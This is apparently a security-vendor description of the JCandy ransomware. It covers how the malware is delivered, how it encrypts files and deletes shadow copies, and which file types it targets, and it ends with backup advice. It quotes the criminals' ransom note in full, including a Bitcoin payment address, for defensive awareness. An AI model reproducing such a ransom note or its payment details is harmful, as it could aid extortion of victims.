JCandy Ransomware

The JCandy Ransomware is an encryption ransomware Trojan that was first observed on November 13, 2017. The JCandy Ransomware seems to be the product of an independent group of cybercrooks rather than being part of a larger family of ransomware Trojans or belonging to a RaaS (Ransomware as a Service.) The JCandy Ransomware may be delivered to victims through spam email attachments, often disguised as messages from legitimate senders and taking the form of Microsoft Word documents with corrupted macro scripts that download and install the JCandy Ransomware onto the victim's computer. Ransomware Trojans like the JCandy Ransomware's main purpose is to force computer users to pay large ransoms. To do this, the JCandy Ransomware takes the victim's files hostage by encrypting the victim's files using a strong encryption algorithm. The JCandy Ransomware also disables other alternate file recovery methods, such as deleting the Shadow Volume Copies of the victim's files. Unfortunately, once the JCandy Ransomware has encrypted the victim's files, it is impossible to restore the compromised files currently without access to the decryption software and key, which the cybercrooks hold in their possession.

How the JCandy Ransomware Takes the Victim's Files Hostage

The JCandy Ransomware takes the victim's files hostage by encrypting them with an AES 256 encryption algorithm. The JCandy Ransomware marks the files compromised by its attack with the file extension .'locked-jCandy,' added to all the affected file's name. Once the JCandy Ransomware encrypts the files, they are no longer readable and will show up as blank icons on the infected computer. The JCandy Ransomware stores the decryption key on the JCandy Ransomware's Command and Control servers, out of reach of the victim or security software and analysts. Without the decryption key, the files encrypted by the JCandy Ransomware attack are not recoverable and have been taken hostage effectively.

The JCandy Ransomware and Its Ransom Demand

The JCandy Ransomware delivers a program window named 'jCandy' on the infected computer after encrypting the victim's files. The JCandy Ransomware's program window contains the JCandy Ransomware's ransom note, which reads as follows:

'jCandy
YOUR FILES HAVE BEEN LOCKED
We have encrypted ALL your important files!
We have NOT deleted ANY files. Your files have been LOCKED!
If you would like access to your files you will need to purchase S200 USD worth of BITCOIN and have it sent to this bitcoin address below.
After the payment is recieved your files will be decrypted and this program will delete itself.
You have 48 hours to send the payment and have your files unlocked.
If you fail to do so, your files will be DELETED
~ Kind Regards, jCandy
SEND PAYMENT TO [12pFSG5hxcbdV33JmcSnEnFXr1woFYTeew] [Copy|BUTTON] [Unlock my files|BUTTON] [BUY BITCOIN]'

The JCandy Ransomware demands a ransom payment of 200 USD to be paid in Bitcoins, due to the fact that Bitcoin allows people to send and receive payments anonymously. The JCandy Ransomware will encrypt the user-generated files, especially the ones that have the following file extensions:

.txt, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .jpg, .png, .csv, .sql, .mdb, .sln, .php, .asp, .aspx, .html, .xml, .psd, .zip, .rar.

Since the JCandy Ransomware works by restricting the victims' access to their files, the best protection against ransomware Trojans like the JCandy Ransomware is to have file backups. If computer users have file backups, then the cybercrooks' approach in this attack becomes ineffective completely. A combination of file backups with a reliable security program is the best way to ensure that your data is safe from threats such as the JCandy Ransomware. This is especially true as ransomware Trojans like the JCandy Ransomware become more popular and start to take over an increasingly larger percentage of the threat market and the current Trojan ecosystem that is being utilized to carry out attacks on computer users.